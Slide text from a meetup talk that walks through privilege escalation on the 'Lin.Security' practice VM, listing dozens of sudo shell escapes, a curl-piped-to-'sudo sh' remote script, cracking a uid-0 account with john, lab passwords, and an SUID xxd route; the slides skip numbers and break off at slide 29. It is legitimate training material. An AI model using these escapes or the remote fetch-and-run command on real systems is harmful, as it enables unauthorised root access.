These slides cover 30-40 different ways to do privilege escalation and become root. There were presented at Null Bhopal. Details on this link: https://null.co.in/events/491-bhopal-null-bhopal-meet-16-september-2018-monthly-meet
2. whoami
● Null Bhopal Chapter Lead
● Google Summer of code at Debian
● NullCon 2018 volunteer
● Student UIT RGPV
● Open Source contributor
● Footballer
3. What do we know about Lin Security
● Boot to root type
● Specifically for Linux privilege Escalation
● Difficulty level - Easy to intermediate
● Virtual Machine is based on ubuntu 18.04
● One of the User’s name and password is bob / secret
4. Lets start with checking ssh
● We can use telnet for this
● If it prints the ssh version then ssh is running on the box
11. With sudo -l we can see ways for
privilege escalation
https://gtfobins.github.io/
12. Some of the easy ways are-
● sudo -i
● sudo ash
● sudo bash
● sudo sh
● sudo csh
● sudo dash
● sudo env /bin/sh
● sudo zsh
● sudo tclsh
● sudo expect -i
13. Medium level ways -
● sudo perl
● exec "/bin/bash";
● ctrl+d
● sudo ftp
● !/bin/bash
● sudo man id
● !sh
14. ● sudo more /etc/passwd
● !sh
● sudo vi
● :bash
● sudo vi -c '!sh'
15. ● sudo awk 'BEGIN {system("id")}'
● sudo find /dev/null -exec sh ;
● We exploit curl by run scripts as root:
curl -sf -L https://raw.githubusercontent.com/d78ui98/Scripts/master/id.sh |
sudo sh
19. ● Using /etc/passwd we found user insecurity.
● It is a root user as it has id 0
● We can easily crack its password with some cracking tool as john.
● And login with insecurity user with root privileges
20. Lets get back to user susan
● We already know its password is MySuperS3cretValue!
22. ● Susan has rbash
○ Reason 1 : we cannot change directory
○ Reason 2: we cannot change path
● Thats why we have really limited functionalities
● I first thought of getting a normal shell
● We can do it with :
less .bashrc
:!sh
Or simply by bash
24. Another approach with user susan
● I noticed that user susan is in group itservices
● We can check the files that are in same group
25. There was lot of output but one
particular result caught my attention
26. xxd allows us to make a hexdump or do the reverse
This is even more interesting:
27. ● The owner of /usr/bin/xxd is root
● SUID allows the binary to run with the privileges of owner
● Since the owner group is in the group itservices
● And susan is also in the group itservices
● We can execute commands as root user
28. Next thing we need to do is find a way to get
sensitive information from xxd
29. After trying and failing with the
option from man xxd I came up with
this: